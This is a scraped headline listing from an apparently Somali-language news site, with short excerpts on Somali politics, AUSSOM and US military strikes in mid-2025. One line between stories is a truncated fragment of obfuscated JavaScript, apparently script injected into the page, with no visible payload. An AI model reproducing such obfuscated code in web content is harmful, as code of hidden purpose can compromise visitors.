Madaxweynaha Soomaaliya oo la kulmay saaxiibada caalamiga ah
MUQDISHO - Wararka laga helayo ilo xog ogaal ah ayaa sheegaya in Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, uu Isniintii shalay magaalada Muqdisho kulan kula...
AUSSOM oo beenisay in diyaarad helicopter ah looga riday Xawaadley
MUQDISHO, Soomaaliya - Hawlgalka Midowga Afrika ee Taageerada iyo Xasilinta Soomaaliya (AUSSOM) ayaa xaqiijiyay in Ciidamadii Burundi ee ku sugnaa saldhigga hore ee Xawaadley,...
Farmaajo oo ka hadlay Shirka uu ku baaqey Madaxweyne Xasan Sheekh
DOHA - Farmajo ayaa soo dhaweeyay wadahadalka uu ku baaqey Xasan Sheekh, isagoo ugu baaqey Madaxweynaha inuu ka laabto wax ka bedelka dastuurka, dhismaha gudiga...
Ra’iisul Wasaaraha Soomaaliya oo la kulmay Madaxweynaha Jabuuti
Jabuuti, Isniin, 02 Juunyo 2025: -- Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kulan muhiim ah la yeeshay Madaxweynaha Jamhuuriyadda...
Milatariga Mareykanka oo laba duqeyn ku qaaday ISIS-Soomaaliya
Muqdisho, Juun 2, 2025 – Taliska Ciidamada Mareykanka ee Afrika (AFRICOM) ayaa Axaddii shalay shaaciyay in labo duqeyn ay ka fuliyeen gudaha Soomaaliya, kuwaas...
Siyaasiga Cabdi Barre Jabriil oo ka digay in dalka lagu wado jiho halis ah
Muqdisho – Siyaasiga Cabdi Barre Jabriil oo ka mid ah siyaasiyiinta Soomaaliyeed ayaa waraysi gaar ah oo uu siiyey warbaahinta Shabelle kaga hadlay xaaladda...
Mucaaradka oo Shuruud ku xiray ka qeybgalka Shirka uu ku baaqey Madaxweynaha
MUQDISHO, Soomaaliya - Madasha Samatabixinta ee ay ku mideysanyihiin Mucaaradka oo sharuudo adag ku xiray gogosha uu fidiyey markale Xasan Sheekh Maxamuud.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...
Maxaa looga hadlay Shirka Deg Dega ee Gollaha Wasiiradda Soomaaliya?
MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, ayaa maanta yeeshay kulan gaar ah, kaasoo uu guddoominayay Ra’iisul Wasaare ,Mudane Xamsa Cabdi Barre.
Shirka...
Madaxweynaha Soomaaliya oo Ku Dhawaaqay in Wadahadal Qaran Qaban Doono 15-ka June
MUQDISHO, Juun 1 — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Maanta ku dhawaaqay in Wadahadalladii Qaran ee muddo dheer dib u dhacay la qaban...
Mahad Salaad oo markale loo magacaabey Taliyaha Hay’adda NISA
MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay shir deg deg ah, ayaa ansixiyey soo jeedinta Wasaaradda Amniga Gudaha ee...















